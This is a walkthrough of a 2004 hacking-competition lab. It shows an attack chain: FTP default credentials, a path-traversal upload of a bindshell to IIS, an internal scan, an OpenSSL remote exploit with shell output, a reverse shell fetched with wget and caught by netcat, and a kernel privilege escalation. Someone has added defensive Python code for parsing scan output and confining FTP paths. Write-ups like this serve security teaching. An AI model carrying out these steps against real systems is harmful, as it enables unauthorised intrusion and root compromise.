This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).
This is actually a replication (lab conditions) of one of my latest penetration tests, which I enjoyed thoroughly.
I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.
1. A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 are open suggests this machine is not firewalled, and is connected directly to the internet.
2. It looks like a Windows 2000 box (judging by the versions of the web and SMTP servers). There also seems to be a third-party FTP server: Flash FTP server 2.1.
3. I seem to remember seeing a recent vulnerability in Flash FTP server, and a quick Google search confirms my suspicions.
4. With a bit of trial and error, I find that the ftp username and password are ftp / ftp.
5. I log on to the ftp, and check where the ftp home directory lies. I attempt to upload a bindshell (srvcmd.exe) to the default location of the IIS "scripts" directory (using file traversal), in order to be able to execute the bindshell.
6. Once that's done, I execute srvcmd.exe by pointing my web browser to it.
7. Once executed, the bindshell opens a cmd shell on port 2323. What's this? A dual-homed machine?
8. We now have IUSR privileges on the Windows box, and the ability to ftp files to the machine using username ftp / ftp.
9. We upload our favorite toolkit to the ftp server, including a port scanner, and scan the internal network (192.168.0.0/24).
C:\internet\ftpserver>sl -bhtz 192.168.0.1-254
sl -bhtz 192.168.0.1-254
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com

Scan of 254 IPs started at Thu Jan 15 19:28:45 2004

------------------------------------------------------------------------------

192.168.0.1
Responded in 0 ms. 0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456

TCP 25:
[220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]

Responded in 0 ms. 0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 110 389
UDP ports:

TCP 21:
[220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]

Scan finished at Thu Jan 15 19:29:25 2004

7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs

C:\internet\ftpserver>
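The point of steps 1 and 9 is what an unfiltered port list tells you: RPC endpoint-mapper and Terminal Services ports answering from the outside mean no border firewall is in the way. The following added example (my own code, not part of the original write-up or of ScanLine) parses ScanLine-style output into host records and flags hosts whose open TCP ports fall on a never-expose policy list. The sample text is a constructed reproduction of the scan above; the page lost the IP of the second host, so 192.168.0.111 is assumed from steps 10 and 11, and the policy list itself is an assumption rather than something the write-up defines.

```python
"""Parse ScanLine-style output and flag hosts whose open ports show the
border is not filtered.  Added example; not part of the original write-up."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Policy list (assumption, not defined by the write-up): TCP ports that a
# perimeter filter is expected to block in front of a Windows host.  1025,
# 1026 and 3372 are the ones the write-up treats as the tell-tale sign.
NEVER_INTERNET_EXPOSED = {135, 139, 445, 1025, 1026, 3372, 3389}

# Constructed sample reproducing the write-up's scan output.  The second
# host's IP is missing on the page; 192.168.0.111 is assumed from steps 10-11.
SCAN_OUTPUT = """\
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com

Scan of 254 IPs started at Thu Jan 15 19:28:45 2004

------------------------------------------------------------------------------

192.168.0.1
Responded in 0 ms. 0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456

TCP 25:
[220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]

192.168.0.111
Responded in 0 ms. 0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 110 389
UDP ports:

TCP 21:
[220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]

Scan finished at Thu Jan 15 19:29:25 2004

7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs
"""

IP_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})$")
PORTS_RE = re.compile(r"^(TCP|UDP) ports:\s*(.*)$")
BANNER_RE = re.compile(r"^TCP (\d+):$")


@dataclass
class Host:
    ip: str
    tcp: list[int] = field(default_factory=list)
    udp: list[int] = field(default_factory=list)
    banners: dict[int, str] = field(default_factory=dict)


def parse_scanline(text: str) -> list[Host]:
    """Each bare IP line starts a host record; the port lists and banners
    that follow are attached to it until the next IP line."""
    hosts: list[Host] = []
    lines = [ln.strip() for ln in text.splitlines()]
    for i, line in enumerate(lines):
        if m := IP_RE.match(line):
            hosts.append(Host(ip=m.group(1)))
            continue
        if not hosts:
            continue  # banner and header text before the first host
        host = hosts[-1]
        if m := PORTS_RE.match(line):
            ports = [int(p) for p in m.group(2).split()]
            (host.tcp if m.group(1) == "TCP" else host.udp).extend(ports)
        elif (m := BANNER_RE.match(line)) and i + 1 < len(lines):
            # ScanLine prints the grabbed banner on the next line in brackets
            host.banners[int(m.group(1))] = lines[i + 1].strip("[]")
    return hosts


def exposed_services(hosts: list[Host]) -> dict[str, list[int]]:
    """Hosts whose open TCP ports intersect the never-expose policy list."""
    findings: dict[str, list[int]] = {}
    for h in hosts:
        hit = sorted(set(h.tcp) & NEVER_INTERNET_EXPOSED)
        if hit:
            findings[h.ip] = hit
    return findings


if __name__ == "__main__":
    parsed = parse_scanline(SCAN_OUTPUT)
    for ip, ports in exposed_services(parsed).items():
        print(f"{ip}: policy-blocked ports {ports} reachable -> unfiltered host")
    for h in parsed:
        for port, banner in h.banners.items():
            print(f"{h.ip} tcp/{port}: {banner[:60]}")
```

Run against the sample, only 192.168.0.1 is reported, with exactly the RPC, NetBIOS, SMB and Terminal Services ports that a border filter should have hidden; the same check run from the outside against your own address range is a cheap way to catch a host that was put on the internet without a firewall.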
10. Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual: I was running HoneyD to simulate a larger network. Identifying the real Linux box (192.168.0.111, running Mandrake 8.2) took a long time, so I'll just cut the story short :)
11. I identify a quickly exploitable service on the Mandrake machine (OpenSSL), and upload a cygwin-compiled version of the exploit (including DLLs) into the ftp directory. I execute the exploit, and get a shell on the internal Mandrake box.
C:\internet\ftpserver>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 20AA-0A2D

C:\internet\ftpserver>openssl-too-open.exe -a 0x15 -v 192.168.0.111
openssl-too-open.exe -a 0x15 -v 192.168.0.111
: openssl-too-open : OpenSSL remote exploit by Solar Eclipse <solareclipse@phreedom.org>

bash-2.05$ uname -a; id; w;
Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
 root     vc/1     -                 2:31pm   7:23   0.41s  0.36s -bash
bash-2.05$
12. The shell I get is a bit shifty, and echoes all my commands twice. I decide to upload a reverse bindshell onto the Mandrake box, and make it connect back to my attacking machine. I do this using wget, retrieving the rbs.c file from www.secureit.co.il.
13. Once that's done, I compile and execute the reverse bind shell, while netcat is listening on port 4000 on the attacking machine. This gives me a cleaner shell, with "apache" user privileges.
14. Vaguely remembering the output of the uname command (Linux box82 2.4.18-6mdk) I decide to attempt a privilege escalation attack using the Linux kernel ptrace/kmod local root exploit, which should work under several 2.2.x and 2.4.x kernels.
15. I download (wget, again), compile and execute the exploit, hoping for the best.
16. The exploit was successful, and we now have root privileges on the Mandrake box. The .doc file was located in /root/C.doc.
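The whole chain hangs on step 5: an FTP server that let a client-supplied path escape the FTP root, so an upload landed in a directory the web server would execute. The following added example (my own code, not the FTP server's or the page's) shows the check such a server has to make on every path a client sends. It uses ntpath so that Windows path rules apply even when run on a Unix host, the FTP root C:\internet\ftpserver is assumed from the prompt in the write-up, and the request strings are constructed samples, with C:\inetpub\scripts standing in for the IIS scripts directory the page mentions without naming a path.

```python
"""Confine client-supplied FTP paths to the server's root directory.
Added example, not the FTP server's own code."""
import ntpath
from typing import Dict, List, Optional


def resolve_ftp_path(ftp_root: str, requested: str) -> Optional[str]:
    """Map an FTP client's path onto disk; return None if it would leave ftp_root.

    Handles the lexical cases: "..", forward or back slashes, absolute and
    drive-letter paths.  It does not follow junctions or reparse points, so a
    real server must also resolve the final path through the OS before use.
    """
    root = ntpath.normpath(ftp_root)
    # Drop the FTP-level leading slash so "/pub/x" means "<root>\pub\x", then
    # let the path library collapse "." and "..".  A rooted or drive-lettered
    # request makes ntpath.join discard the root, which the check below catches.
    candidate = ntpath.normpath(ntpath.join(root, requested.lstrip("/\\")))
    try:
        common = ntpath.commonpath([root, candidate])
    except ValueError:
        return None  # request named a different drive
    # Windows paths are case-insensitive, so compare normalised forms.
    if ntpath.normcase(common) != ntpath.normcase(root):
        return None
    return candidate


# Assumed from the write-up's prompt (C:\internet\ftpserver>).
FTP_ROOT = r"C:\internet\ftpserver"

# Constructed sample requests.  The ones a confined server must refuse are
# those that would place a file outside the FTP tree, e.g. in the IIS scripts
# directory (C:\inetpub\scripts used here as a stand-in path).
SAMPLE_REQUESTS: List[str] = [
    "upload.txt",
    "/pub/../upload.txt",
    r"..\..\inetpub\scripts\srvcmd.exe",
    "../../inetpub/scripts/srvcmd.exe",
    r"C:\inetpub\scripts\srvcmd.exe",
    r"D:\elsewhere\file.bin",
]


def audit(requests: List[str]) -> Dict[str, Optional[str]]:
    """Resolve each request; None marks a request the server must refuse."""
    return {r: resolve_ftp_path(FTP_ROOT, r) for r in requests}


if __name__ == "__main__":
    for req, where in audit(SAMPLE_REQUESTS).items():
        print(f"{req!r:42} -> {where or 'REFUSED (escapes FTP root)'}")
```

Confinement is only half of the fix the chain needs: even with traversal closed, a directory that both accepts uploads and carries execute permission (the IIS scripts directory in step 6) turns any file write into code execution, so upload targets and executable directories should never overlap.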
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.